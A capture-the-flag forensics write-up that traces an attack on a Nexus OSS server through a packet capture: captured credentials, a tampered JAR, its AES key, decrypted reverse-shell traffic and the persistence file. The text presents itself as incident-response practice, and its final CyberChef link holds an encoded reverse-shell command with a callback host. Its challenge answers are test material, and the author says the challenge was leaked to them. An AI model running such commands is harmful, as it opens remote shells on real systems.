HTB Global Cyber Skills Benchmark CTF 2025: Operation Blackout - Journal

This is a challenge from a corporate CTF that a senior at F leaked to me so I could try it out (thanks my brother Ravi) ![image](https://hackmd.io/_uploads/SkZIwldMgl.png) **Q1: Which credentials has been used to login on the platform? (e.g. username:password)** Looking through the pcap file, since the challenge asks to find credentials, I filtered for keywords like `auth`, `authentication`,... As everything is plain HTTP, it’s easy to read the payload of the auth request. ![image](https://hackmd.io/_uploads/HkZEJe8fle.png) **Ans:** admin:dL4zyVJ1y8UhT1hX1m **Q2: Which Nexus OSS version is in use? (e.g. 1.10.0-01)** Looking at the response of the previous request, often the server responds with the current system version in the headers. ![image](https://hackmd.io/_uploads/B1mBJg8zxg.png) **Ans:** 2.15.1-02 **Q3: The attacker created a new user for persistence. Which credentials has been set? (e.g. username:password)** Reading the challenge we see the words `create` and `set`. Based on basic networking knowledge, these actions are usually sent via `POST`. ![image](https://hackmd.io/_uploads/ByQjyeIfgg.png) **Ans:** adm1n1str4t0r:46vaGuj566 **Q4: One core library written in Java has been tampered and replaced by a malicious one. Which is its package name? (e.g. com.company.name)** Looking further into the capture file I noticed a `PUT` request with a `.jar` file extension that looks suspicious. ![image](https://hackmd.io/_uploads/rk12lf8flx.png) ![image](https://hackmd.io/_uploads/SkpK0kLfxx.png) **Ans:** com.phoenix.toolkit **Q5 & Q6:** **- The tampered library contains encrypted communication logic. What is the secret key used for session encryption? (e.g. Secret123)** **- Which is the name of the function that manages the (AES) string decryption process? (e.g. aVf41)** Seems my suspicion was right, this file is obfuscated in the style typical of malware. I read through and summarized it like this: ![image](https://hackmd.io/_uploads/HkNVzM8zex.png) ![image](https://hackmd.io/_uploads/Sks9RkLGle.png) **Ans:** uJtXq5 By leveraging the fact that the key will be decrypted before use, we can print it out after it is successfully decrypted. ![image](https://hackmd.io/_uploads/Hy4sAyIMlg.png) **Ans:** vuvtuYXvHYvW"#vu **Q7: Which is the system command that triggered the reverse shell execution for this session running the tampered JAR? (e.g. "java .... &")** Simple: "run it". **Ans:** java -jar PhoenixCyberToolkit-1.0.jar **Q8: Which is the first executed command in the encrypted reverse shell session? (e.g. whoami)** ![image](https://hackmd.io/_uploads/rk_w3YUzlx.png) ``` tcp && tcp.port == 4444 ``` The communication data is encrypted `AES` -> `Base64`, just need to reverse this process :smile: ![image](https://hackmd.io/_uploads/H1Q3RtUMgl.png) ![image](https://hackmd.io/_uploads/SyhiCkUfge.png) **Ans:** uname -a **Q9: Which other legit user has admin permissions on the Nexus instance (excluding "adm1n1str4t0r" and "admin")? (e.g. john_doe)** ![image](https://hackmd.io/_uploads/r1qnRkIMge.png) **Ans:** john_smith **Q10: The attacker wrote something in a specific file to maintain persistence, which is the full path? (e.g. /path/file)** Still basic obfuscation techniques, after decoding we can see the path used for persistence. [![image](https://hackmd.io/_uploads/rkU001Lfxe.png)](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt(%7B'option':'UTF8','string':'vuvtuYXvHYvW%22%23vu'%7D,%7B'option':'Hex','string':''%7D,'ECB','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=Z3B2WGtRTDg4QmJiRzVMOXZhSVc2Zno5TkJ5cTVubmVLc29GUE0rMXJPZ1VMNjlkQjZ6WVRQcHVNMmxRNkpGRXpqYU9xOUhtcXo4SS94TE1tWE1yWmcxWExpOXdGYjc2ZG90ZEFVblhwVll1NkdvalZnS1ZxUU1wTGVVTHJhVXMyaEZZWXZraUUxd2MvcG5jUHdQWFEvMklsUjR2d1VCbmFxTlRVZzM0ZGJLcTJHN2ZSb254NFJSWmxMMjBOY0pLNmowbjZGUC9UV0s2ajc3ZzhHZnNSdEYybWMvczQveWg0Ri95VHM4Z3phV2JjM1d4TUgwVktOb3BrUm9HcWczOFZOTGF1M01XTVZkajN0NENkQmRObG84dEpCcnlSbWxCUkJjYXBUVkN2YjF4dlQ1VnlLR2tROGJheFIrbmFFbEdybmpTMzhTTmE0MjJlSHlydjM5NXBzZDc0RENMZGlEc1Z1YlFyRUZZNGpZUkw5MzE4MC9aVEJucU5zWkx0Sm9NRmx1L01JelkvUnMyR0JzNnRtb1pkL1F1RVUwUDZ4b28rdHZXamFCYlJxSEFKb3dweURvekpEbmFBZWQvaEp6OTFieEx2SFlYNU13VDl0YXRscUtHKy81RHhBcHJPQ01sZER0dk9RcGR3THJtQjdydmllQWZJc2tpaVlCZEdVSDZ2VHk0QzV3R0JFK3BHTFFjV3h1QUdGREJGelBsN25pMm5GcGIrcjNyOHM0QXp5T2ordzNWbVY3MG50d1d1RUVSYzJFdXdOTDd3WDUzSjl0QW5IbUtmdFRPWmJXaGMyRElzMkFKYldDRGsvSmRVaHBLekNBSkw0T1hZbFI2MjllVUJEVXhaUHhhUjhPelMvNDdzN3pLS1BJeHRPaXlha1lWMzdDQ2lEZEp5a3BDZXVkdFVxbDFpUWFSZGVrQlBSUWtKSTBHUXYrSUN2ZHhRSXY1NERSVTFjQU9LMDRnbTNnQ2FQRzRIU1UrZ2h1dklkVUZXS0FEWHJGTWpFRkhpT3MwbXY3bmVMZFZ4c2RQZTNCVFFyRGtvSEQrdW5uQUc1bWVjNGlmeTdjc3N4V3lZckZFR3dldEdQWEk0YlFzbHVxeXJQYnpqTmxTWTZKbUdOYTAwUXVvN3pLTHptMzdJTVdWUndGN0VqWUJWYVU9DQo&ieol=CRLF) ![image](https://hackmd.io/_uploads/H1RA0kUMxl.png) ![image](https://hackmd.io/_uploads/Bkv11eLfxe.png) ![image](https://hackmd.io/_uploads/rkWlkeUMge.png) **Ans:** /sonatype-work/storage/.phoenix-updater [recipe](https://gchq.github.io/CyberChef/#recipe=Reverse('Byte')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=PW9nY2xSWFlrQlhkdGdYYXVWMmJvQm5MdlUyWmhKM2IwTjNMckozYjMxU1p3bEhkaDUyYno5Q0k0dENJazlXYm9OR0ltWUNJeVZHZGhSR2MxMUNlcDVXWnZoR2N1OFNabkZtY3ZSM2N2c21jdmRYTGxCWGUwRm1idk4zTGc0RElpRWpKK0FESTBRRE4wOHlNeTRDTXg0Q014NENNeDhDY2pSM0wyVkdadkFpSitBU2F0QUNhekZtWWlBeWJvTlda) *29/05/2025*